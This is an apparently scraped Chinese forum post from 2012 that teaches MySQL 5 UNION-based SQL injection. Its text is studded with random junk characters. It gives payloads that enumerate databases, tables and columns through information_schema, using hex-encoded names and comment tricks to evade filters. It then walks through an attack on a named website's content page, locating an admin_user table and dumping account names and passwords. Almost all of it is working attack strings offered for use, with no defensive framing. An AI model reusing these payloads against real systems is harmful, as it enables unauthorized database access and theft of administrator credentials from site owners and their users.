查库
/ C% [" u3 L2 A% `8 U6 H1 y9 e$ N7 [0 C/ O1 m
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*1 ]9 O" F$ g6 \+ r {
: s& V2 @0 s6 r3 Q! Y6 U C' D3 {) `
查表/ A4 ~- h* U0 E% r8 v5 ?9 M
5 G P* W# W) s$ Gid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,17 t, T# l3 |5 M4 @* U
8 P( I1 d! f- c; b8 Q9 y查段& e" @1 y* \( `8 a5 E# e
5 `, B9 Y( ~0 u8 a; _% }* `/ [id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
6 ^6 J8 y* I# d* V6 h0 u7 K5 H" }! u* ^3 E9 y+ u4 Q
4 z# i$ o' \ B" Rmysql5高级注入方法暴表: D" ^, c: G0 f. G( U' U& _
! S% i. k6 V- ^
例子如下:
: F( p+ j# B0 {" I3 w* j3 G% S# V; P( z5 C9 Z( W9 D
1.爆表7 c3 l* I+ o! C, X" u$ n
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)3 L8 J8 I5 @: n
这样爆到第4个时出现了admin_user表。
" a$ q7 m( x# i+ ~3 e
" w3 E# Y6 E9 b2.暴字段; [0 O% Q" \$ f9 g/ w2 _
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
' s) `# T8 b+ A) b
4 a; m/ Z# G! T9 Y. B. M) W, H9 Q1 x* H$ g% s6 P
3.爆密码
4 d0 c; U) p$ z/ X, G' Qhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 5 n* }1 e; C. y* N% _- |6 h/ W
, q2 N8 A* O" u2 R6 g
5 p9 _) E; D7 b3 ^) B' i% w- n" v
|
发表于 2012-9-13 16:29:37
收藏
支持
反对